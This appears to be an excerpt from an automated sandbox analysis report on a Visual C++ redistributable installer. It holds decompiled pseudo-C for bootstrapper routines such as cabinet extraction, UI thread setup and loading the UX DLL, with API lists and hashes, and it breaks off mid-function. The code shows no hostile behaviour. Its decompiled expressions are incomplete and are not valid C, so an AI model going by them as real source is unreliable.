                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorEventLast
                                                                          • String ID: @Met$Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp
                                                                          • API String ID: 545576003-1997294977
                                                                          • Opcode ID: 2b2e5d3d2232d523035a1af6a2f1e91ca30a0d3020a18bf17d37ca16c6b6d044
                                                                          • Instruction ID: 8ffa0c3d617dd0a6cc687c3d72ad4aaec331fd3827b8f4420941f51d213118da
                                                                          • Opcode Fuzzy Hash: 2b2e5d3d2232d523035a1af6a2f1e91ca30a0d3020a18bf17d37ca16c6b6d044
                                                                          • Instruction Fuzzy Hash: 9721E3B2A40B25BAF7216679AC41FF775DCEF447A0B014223BD05E7681EB99DC0089F6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D0627 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 103fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E000D0627(void* __ecx, CHAR* _a4) {
				void* _v8;
				long _t18;
				void* _t19;
				signed short _t22;
				void* _t27;
				int _t29;
				signed short _t33;
				signed int _t36;
				int _t37;
				signed int _t40;
				void** _t44;
				void* _t47;

				_push(__ecx);
				_t40 =  *0x11aac0; // 0x0
				_push(_t36);
				_t37 = _t36 | 0xffffffff;
				_t47 = 0;
				_v8 = _t37;
				_t44 =  *( *((intOrPtr*)( *[fs:0x2c] + _t40 * 4)) + 4);
				_t18 = CompareStringA(0, 0, "<the>.cab", _t37, _a4, _t37); // executed
				if(_t18 != 2) {
					_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x8000080, 0);
					_v8 = _t19;
					if(_t19 == _t37) {
						_t22 = GetLastError();
						_t51 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
						_t47 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "cabextract.cpp", 0x2d5, _t47);
						E000F012F(_t47, "Failed to open cabinet file: %hs", _a4);
					}
					L8:
					_t44[0xc] = _t47;
					_t21 =  <  ? _t37 : _v8;
					return  <  ? _t37 : _v8;
				}
				_t27 = GetCurrentProcess();
				_t29 = DuplicateHandle(GetCurrentProcess(),  *_t44, _t27,  &_v8, 0, 0, _t18); // executed
				if(_t29 != 0) {
					_t47 = E000D04BE(_t40,  &(_t44[7]), _v8, _t44[2], _t44[3]);
					if(_t47 >= 0) {
						goto L8;
					}
					_push("Failed to add virtual file pointer for cab container.");
					L3:
					_push(_t47);
					E000F012F();
					goto L8;
				}
				_t33 = GetLastError();
				_t55 =  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
				_t47 =  >=  ? 0x80004005 :  <=  ? _t33 : _t33 & 0x0000ffff | 0x80070000;
				E000B37D3(0x80004005, "cabextract.cpp", 0x2ca, _t47);
				_push("Failed to duplicate handle to cab container.");
				goto L3;
			}















                                                                          0x000d062a
                                                                          0x000d062b
                                                                          0x000d0637
                                                                          0x000d063d
                                                                          0x000d0644
                                                                          0x000d0646
                                                                          0x000d0649
                                                                          0x000d0657
                                                                          0x000d0660
                                                                          0x000d06f0
                                                                          0x000d06f6
                                                                          0x000d06fb
                                                                          0x000d06fd
                                                                          0x000d070e
                                                                          0x000d0718
                                                                          0x000d0726
                                                                          0x000d0734
                                                                          0x000d0739
                                                                          0x000d073c
                                                                          0x000d073c
                                                                          0x000d0746
                                                                          0x000d074d
                                                                          0x000d074d
                                                                          0x000d066f
                                                                          0x000d0677
                                                                          0x000d067f
                                                                          0x000d06d0
                                                                          0x000d06d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d06d6
                                                                          0x000d06b4
                                                                          0x000d06b4
                                                                          0x000d06b5
                                                                          0x00000000
                                                                          0x000d06bb
                                                                          0x000d0681
                                                                          0x000d0692
                                                                          0x000d069c
                                                                          0x000d06aa
                                                                          0x000d06af
                                                                          0x00000000

                                                                          APIs
                                                                          • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 000D0657
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 000D066F
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 000D0674
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 000D0677
                                                                          • GetLastError.KERNEL32(?,?), ref: 000D0681
                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 000D06F0
                                                                          • GetLastError.KERNEL32(?,?), ref: 000D06FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                          • String ID: <the>.cab$@Met$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                          • API String ID: 3030546534-1066054086
                                                                          • Opcode ID: d8245549e864ed012abe5840dbd8bb57ae7da5223a5de489439613a5407b685f
                                                                          • Instruction ID: 7ff3aa09c850844319b9aa0c0ac7c9c93fb05cb94e16daa09ed3672ed5d22cce
                                                                          • Opcode Fuzzy Hash: d8245549e864ed012abe5840dbd8bb57ae7da5223a5de489439613a5407b685f
                                                                          • Instruction Fuzzy Hash: 10312672A41324BBEB209B69CC48FAB7EACFF04760F100126FD08E7690C7619D10DAE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000CE82A Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 99threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 62%
                                                                          			E000CE82A(intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void _v24;
				void* _t21;
				void* _t24;
				void* _t28;
				intOrPtr _t43;
				int _t45;

				_v12 = 0;
				asm("stosd");
				_t45 = 0;
				asm("stosd");
				_v8 = 0;
				asm("stosd");
				_t21 = CreateEventW(0, 1, 0, 0);
				_v12 = _t21;
				if(_t21 != 0) {
					_t43 = _a8;
					_v24 = _t21;
					_v20 = _a4;
					_v16 = _t43;
					_t24 = CreateThread(0, 0, E000CE563,  &_v24, 0, 0); // executed
					_v8 = _t24;
					if(_t24 != 0) {
						WaitForMultipleObjects(2,  &_v12, 0, 0xffffffff);
						 *((intOrPtr*)(_t43 + 0x3e4)) = _v8;
						_t28 = 0;
						_v8 = 0;
					} else {
						_t48 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "uithread.cpp", 0x3c, _t45);
						_push("Failed to create the UI thread.");
						goto L2;
					}
				} else {
					_t51 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "uithread.cpp", 0x33, _t45);
					_push("Failed to create initialization event.");
					L2:
					_push(_t45);
					E000F012F();
					_t28 = _v8;
				}
				if(_t28 != 0) {
					CloseHandle(_t28);
					_v8 = 0;
				}
				if(_v12 != 0) {
					FindCloseChangeNotification(_v12); // executed
				}
				return _t45;
			}













                                                                          0x000ce83a
                                                                          0x000ce83d
                                                                          0x000ce83e
                                                                          0x000ce844
                                                                          0x000ce846
                                                                          0x000ce849
                                                                          0x000ce84a
                                                                          0x000ce850
                                                                          0x000ce855
                                                                          0x000ce894
                                                                          0x000ce898
                                                                          0x000ce89f
                                                                          0x000ce8ad
                                                                          0x000ce8b0
                                                                          0x000ce8b6
                                                                          0x000ce8bb
                                                                          0x000ce8f8
                                                                          0x000ce901
                                                                          0x000ce907
                                                                          0x000ce909
                                                                          0x000ce8bd
                                                                          0x000ce8ce
                                                                          0x000ce8d8
                                                                          0x000ce8e3
                                                                          0x000ce8e8
                                                                          0x00000000
                                                                          0x000ce8e8
                                                                          0x000ce857
                                                                          0x000ce868
                                                                          0x000ce872
                                                                          0x000ce87d
                                                                          0x000ce882
                                                                          0x000ce887
                                                                          0x000ce887
                                                                          0x000ce888
                                                                          0x000ce88d
                                                                          0x000ce891
                                                                          0x000ce914
                                                                          0x000ce917
                                                                          0x000ce919
                                                                          0x000ce919
                                                                          0x000ce91f
                                                                          0x000ce924
                                                                          0x000ce924
                                                                          0x000ce92e

                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,000B5386,?,?), ref: 000CE84A
                                                                          • GetLastError.KERNEL32(?,000B5386,?,?), ref: 000CE857
                                                                          • CreateThread.KERNELBASE ref: 000CE8B0
                                                                          • GetLastError.KERNEL32(?,000B5386,?,?), ref: 000CE8BD
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,000B5386,?,?), ref: 000CE8F8
                                                                          • CloseHandle.KERNEL32(00000000,?,000B5386,?,?), ref: 000CE917
                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,000B5386,?,?), ref: 000CE924
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorLast$ChangeEventFindHandleMultipleNotificationObjectsThreadWait
                                                                          • String ID: @Met$Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                          • API String ID: 1372344712-3967303901
                                                                          • Opcode ID: bb6bae5cf00153a0a38f74828fd034db657de2d5a5d99972ce1965e8329664d0
                                                                          • Instruction ID: 4f0d2aec6757a03aaa485e46a3d15af101b19966bf3bedfc0c52f865a3c37d60
                                                                          • Opcode Fuzzy Hash: bb6bae5cf00153a0a38f74828fd034db657de2d5a5d99972ce1965e8329664d0
                                                                          • Instruction Fuzzy Hash: DD316675E40219BFFB509FA9DD84AAFB6ECEF08350F11412AF905F3191D7709E009AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D1224 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 88threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 55%
                                                                          			E000D1224(intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t20;
				int _t28;
				intOrPtr _t50;

				_t50 = _a4;
				_v16 =  *(_t50 + 0x28);
				_v12 =  *(_t50 + 0x20);
				_v8 = 0;
				_t20 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
				if(_t20 == 0) {
					if(ResetEvent( *(_t50 + 0x28)) != 0) {
						 *((intOrPtr*)(_t50 + 0x2c)) = 0;
					} else {
						_t37 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						_t38 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "cabextract.cpp", 0x13e, _t38);
						_push("Failed to reset operation complete event.");
						goto L7;
					}
				} else {
					if(_t20 == 1) {
						_t28 = GetExitCodeThread( *(_t50 + 0x20),  &_v8); // executed
						if(_t28 == 0) {
							_t43 =  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
							_t44 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
							_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
							E000B37D3(0x80004005, "cabextract.cpp", 0x145, _t44);
							_push("Failed to get extraction thread exit code.");
							goto L7;
						}
					} else {
						_t47 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						_t48 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "cabextract.cpp", 0x14b, _t48);
						_push("Failed to wait for operation complete event.");
						L7:
						_push(_v8);
						E000F012F();
					}
				}
				return _v8;
			}









                                                                          0x000d122b
                                                                          0x000d1236
                                                                          0x000d123c
                                                                          0x000d1246
                                                                          0x000d1249
                                                                          0x000d1251
                                                                          0x000d12ef
                                                                          0x000d1333
                                                                          0x000d12f1
                                                                          0x000d1302
                                                                          0x000d130c
                                                                          0x000d131a
                                                                          0x000d131d
                                                                          0x000d1322
                                                                          0x00000000
                                                                          0x000d1322
                                                                          0x000d1257
                                                                          0x000d125a
                                                                          0x000d129e
                                                                          0x000d12a6
                                                                          0x000d12bd
                                                                          0x000d12c7
                                                                          0x000d12d5
                                                                          0x000d12d8
                                                                          0x000d12dd
                                                                          0x00000000
                                                                          0x000d12dd
                                                                          0x000d125c
                                                                          0x000d126d
                                                                          0x000d1277
                                                                          0x000d1285
                                                                          0x000d1288
                                                                          0x000d128d
                                                                          0x000d1327
                                                                          0x000d1327
                                                                          0x000d132a
                                                                          0x000d1330
                                                                          0x000d125a
                                                                          0x000d133e

                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,00000000,746AF5E0,?,00000000,?,?,?,00000000), ref: 000D1249
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?,?,?), ref: 000D125C
                                                                          • GetExitCodeThread.KERNELBASE(?,?,?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?), ref: 000D129E
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?,?,?), ref: 000D12AC
                                                                          • ResetEvent.KERNEL32(?,?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?,?), ref: 000D12E7
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,000DB555,?,?,80000000,?,?,?,?,?), ref: 000D12F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                          • String ID: @Met$Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                          • API String ID: 2979751695-2925335154
                                                                          • Opcode ID: 68053697c2cddaeccdad973f86f75c57045934bcb46ecfcf90e695509759c20c
                                                                          • Instruction ID: 1fd23945b7c13eafbc48de55c5dd481c49503ac4ca72be627332f6971895e44a
                                                                          • Opcode Fuzzy Hash: 68053697c2cddaeccdad973f86f75c57045934bcb46ecfcf90e695509759c20c
                                                                          • Instruction Fuzzy Hash: 4C218FB1740304BFFB149B69CD45ABE76E8AF04710F50412FB986D66E0EB75DA00AA25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000BD5C0 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 61libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 18%
                                                                          			E000BD5C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HINSTANCE__* _t9;
				signed short _t15;
				signed short _t18;
				intOrPtr* _t21;
				intOrPtr _t24;
				void* _t25;

				_t24 = _a4;
				_t2 = _t24 + 4; // 0x69006e
				_t9 = LoadLibraryW( *( *_t2 + 0x50)); // executed
				 *(_t24 + 0xc) = _t9;
				if(_t9 != 0) {
					_t21 = GetProcAddress(_t9, "BootstrapperApplicationCreate");
					if(_t21 != 0) {
						_t5 = _t24 + 0x10; // 0xfb4a0
						_t25 =  *_t21(_a8, _a12, _t5);
						if(_t25 < 0) {
							_push("Failed to create UX.");
							goto L6;
						}
					} else {
						_t15 = GetLastError();
						_t28 =  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
						_t25 =  >=  ? 0x80004005 :  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "userexperience.cpp", 0x5d, _t25);
						_push("Failed to get BootstrapperApplicationCreate entry-point");
						goto L6;
					}
				} else {
					_t18 = GetLastError();
					_t31 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
					_t25 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "userexperience.cpp", 0x59, _t25);
					_push("Failed to load UX DLL.");
					L6:
					_push(_t25);
					E000F012F();
				}
				return _t25;
			}









                                                                          0x000bd5c4
                                                                          0x000bd5c7
                                                                          0x000bd5cd
                                                                          0x000bd5d3
                                                                          0x000bd5d8
                                                                          0x000bd618
                                                                          0x000bd61c
                                                                          0x000bd650
                                                                          0x000bd65c
                                                                          0x000bd660
                                                                          0x000bd662
                                                                          0x00000000
                                                                          0x000bd662
                                                                          0x000bd61e
                                                                          0x000bd61e
                                                                          0x000bd62f
                                                                          0x000bd639
                                                                          0x000bd644
                                                                          0x000bd649
                                                                          0x00000000
                                                                          0x000bd649
                                                                          0x000bd5da
                                                                          0x000bd5da
                                                                          0x000bd5eb
                                                                          0x000bd5f5
                                                                          0x000bd600
                                                                          0x000bd605
                                                                          0x000bd667
                                                                          0x000bd667
                                                                          0x000bd668
                                                                          0x000bd66e
                                                                          0x000bd673

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(?,00000000,?,000B46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000B5386,?,?), ref: 000BD5CD
                                                                          • GetLastError.KERNEL32(?,000B46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000B5386,?,?), ref: 000BD5DA
                                                                          • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 000BD612
                                                                          • GetLastError.KERNEL32(?,000B46F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,000B5386,?,?), ref: 000BD61E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                          • String ID: @Met$BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp$wininet.dll
                                                                          • API String ID: 1866314245-3673390192
                                                                          • Opcode ID: d7dcdabc52337f2a0532f67ba4d6b3be9d17f0a59ddd2bfa935308b95ec9a6ad
                                                                          • Instruction ID: 167fdd32b57b788d587ef7df5493587600f4c1a9549c562faa9c098b23b8f45a
                                                                          • Opcode Fuzzy Hash: d7dcdabc52337f2a0532f67ba4d6b3be9d17f0a59ddd2bfa935308b95ec9a6ad
                                                                          • Instruction Fuzzy Hash: 6311C632A40726ABEB215A699C05FB777D4AF04750F01413AFE09E7A90EB25CC00EAD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000DB2F6 Relevance: 18.1, APIs: 2, Strings: 8, Instructions: 553COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 67%
                                                                          			E000DB2F6(intOrPtr __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr* _a28) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				void* __ebx;
				signed int __edi;
				signed int __esi;
				intOrPtr* _t240;
				signed int _t244;
				signed int _t245;
				signed int _t247;
				intOrPtr* _t252;
				intOrPtr _t253;
				intOrPtr* _t256;
				void* _t258;
				signed int _t259;
				signed int _t263;
				signed int _t273;
				intOrPtr _t279;
				signed int _t280;
				void* _t283;
				void* _t290;
				signed int _t291;
				intOrPtr* _t294;
				void* _t295;
				signed int _t296;
				signed int _t298;
				intOrPtr _t300;
				signed int _t301;
				void* _t302;

				_t289 = __edx;
				_v64 = _v64 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v28 = 0x80000000;
				_v40 = 0x80000000;
				_t240 =  *((intOrPtr*)(_a8 + 0x10));
				_v44 = 0x80000000;
				_t291 = 0;
				asm("movlpd [ebp-0x38], xmm0");
				_v16 = 0;
				_t296 = E000BD542(_a8, 0, 1,  *((intOrPtr*)( *_t240 + 0x88))(_t240, _t290, _t295));
				_v20 = _t296;
				if(_t296 >= 0) {
					_t289 = _v60;
					_t283 = _v56;
					_t279 = _a16;
					_v8 = _v60;
					while(1) {
						L3:
						_v12 = _t283;
						while(1) {
							_v32 = 0x80000000;
							_v56 = _v56 & 0;
							_v36 = 0;
							_t244 = _v28;
							__eflags = _t244 - 0x80000000;
							_v20 = 0;
							_t245 =  ==  ? 0 : _t244;
							_t298 = _t245 * 0x28;
							__eflags = _t298;
							_v48 = _t245;
							_v52 = _t298;
							_t296 = _v20;
							while(1) {
								L5:
								__eflags = _t245 -  *((intOrPtr*)(_t279 + 0x50));
								if(_t245 >=  *((intOrPtr*)(_t279 + 0x50))) {
									break;
								}
								_t294 =  *((intOrPtr*)(_t279 + 0x4c)) + _v52;
								_v24 = _v24 & 0x00000000;
								__eflags =  *(_t294 + 4);
								if( *(_t294 + 4) == 0) {
									L9:
									_t273 =  *_t294 - 1;
									__eflags = _t273 - 0xb;
									if(_t273 > 0xb) {
										L48:
										_t291 = _v16;
										L49:
										_v52 = _v52 + 0x28;
										_t245 = _v48 + 1;
										_v48 = _t245;
										__eflags = _t296;
										if(_t296 >= 0) {
											continue;
										}
										break;
									}
									switch( *((intOrPtr*)(_t273 * 4 +  &M000DB932))) {
										case 0:
											__eax =  *(__edi + 8);
											_v64 =  *(__edi + 8);
											goto L48;
										case 1:
											__esi = E000DACD6(_a8, _a12, _a20,  *(__edi + 8),  *(__edi + 0xc),  *(__edi + 0x10), __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)));
											_v20 = __esi;
											__eflags = __esi;
											if(__esi < 0) {
												goto L46;
											}
											_v8 = _v8 +  *(__edi + 0x18);
											_v8 = _v8 +  *(__edi + 0x18);
											__eax = _v12;
											asm("adc eax, [edi+0x1c]");
											__edi = 0;
											__eax = _a24;
											 *_a24 =  *_a24 + 1;
											__esi = E000DB2C3(_a8, 0,  *((intOrPtr*)(__ebx + 0x34)),  *_a24);
											_v20 = __esi;
											__eflags = __esi;
											if(__eflags >= 0) {
												goto L46;
											}
											_push(0);
											_push(0);
											_push(L"layout bundle");
											_push(0);
											goto L16;
										case 2:
											_push( *((intOrPtr*)(__edi + 0x14)));
											__eax = _v48;
											_push( *(__edi + 0x10));
											__esi = _a8;
											_push( *(__edi + 0xc));
											_v40 = _v48;
											__eax =  *(__edi + 0x18);
											_v44 =  *(__edi + 0x18);
											__eax =  *(__edi + 8);
											_v16 =  *(__edi + 8);
											__eax =  *((intOrPtr*)(_a8 + 0x10));
											__edi = _v16;
											__ecx =  *__eax;
											_push( *__edi);
											_push(__eax); // executed
											__eax =  *((intOrPtr*)( *__eax + 0x8c))();
											__esi = __eax;
											_v20 = __esi;
											__eflags = __esi;
											if(__eflags < 0) {
												__eax = E000F00CF(__edx, __eflags, __esi, 0xe0000038, 0, L"begin cache package",  *__edi, 0);
											}
											goto L20;
										case 3:
											__eax = _a24;
											__edi = _a8;
											 *_a24 =  *_a24 + 1;
											__esi = E000DB2C3(__edi, 0,  *((intOrPtr*)(__ebx + 0x34)),  *_a24 + 1);
											_v20 = __esi;
											__eflags = __esi;
											if(__eflags >= 0) {
												__eax = _a24;
												_push(0);
												_push(__esi);
												 *_a24 =  *_a24 + 1;
												__eax =  *(__edi + 0x10);
												__edi = _v16;
												__ecx =  *__eax;
												_push( *__edi);
												_push(__eax);
												__eax =  *((intOrPtr*)( *__eax + 0xa8))();
												 *(__edi + 0x78) = __esi;
												__eax = 0x80000000;
												__edi = 0;
												_v40 = 0x80000000;
												_v44 = 0x80000000;
												_v16 = 0;
												L20:
												__ecx = _v12;
												__edx = _v8;
												goto L49;
											}
											__eax = 0;
											_push(0);
											_push(0);
											_push(L"end cache package");
											_push(0);
											L16:
											_push(0xe0000038);
											goto L17;
										case 4:
											goto L48;
										case 5:
											__eax = SetEvent( *(__edi + 8));
											__eflags = __eax;
											if(__eax == 0) {
												__eax = GetLastError();
												__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
												__eflags = __eax;
												__esi =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
												__eax = 0x80004005;
												__eflags = __esi;
												__esi =  >=  ? 0x80004005 : __esi;
												_v20 = __esi;
												__eax = E000B37D3(0x80004005, "apply.cpp", 0x270, __esi);
												_push("Failed to set syncpoint event.");
												_push(__esi);
												__eax = E000F012F();
												goto L68;
											}
											goto L46;
										case 6:
											__esi = E000D951C(_a8, _a12,  *(__edi + 8), 0, 0,  *(__edi + 0xc), __edx, __ecx,  *((intOrPtr*)(__ebx + 0x20)),  *((intOrPtr*)(__ebx + 0x24)));
											__eax =  *(__edi + 8);
											_v20 = __esi;
											__eflags = __esi;
											if(__eflags < 0) {
												_push(0);
												_push( *(__edi + 0xc));
												_push( *__eax);
												_push(0);
												_push(0xe0000137);
												goto L17;
											}
											__edx = _v8;
											__edx = _v8 +  *((intOrPtr*)(__eax + 0x18));
											__ecx = _v12;
											asm("adc ecx, [eax+0x1c]");
											goto L23;
										case 7:
											__eax =  *(__edi + 0x18);
											__eflags = __eax - 0x80000000;
											if(__eax == 0x80000000) {
												L28:
												__eax = E000DAAE8(__ebx, __ecx, _a4,  *(__edi + 8),  *((intOrPtr*)(__edi + 0x1c)),  *((intOrPtr*)(__edi + 0x20)),  *((intOrPtr*)(__edi + 0x24))); // executed
												__esi = __eax;
												_v20 = __esi;
												__eflags = __esi;
												if(__eflags < 0) {
													__eax =  *(__edi + 8);
													_push(0);
													_push( *((intOrPtr*)(__edi + 0x1c)));
													_push( *( *(__edi + 8)));
													_push(0);
													_push(0xe0000138);
													goto L17;
												}
												__edx = _v8;
												L27:
												__edx = __edx +  *(__edi + 0x10);
												__ecx = _v12;
												asm("adc ecx, [edi+0x14]");
												goto L23;
											}
											__ecx = __eax * 0x28;
											__eax =  *(__ebx + 0x4c);
											__eflags =  *(__ecx + __eax + 4);
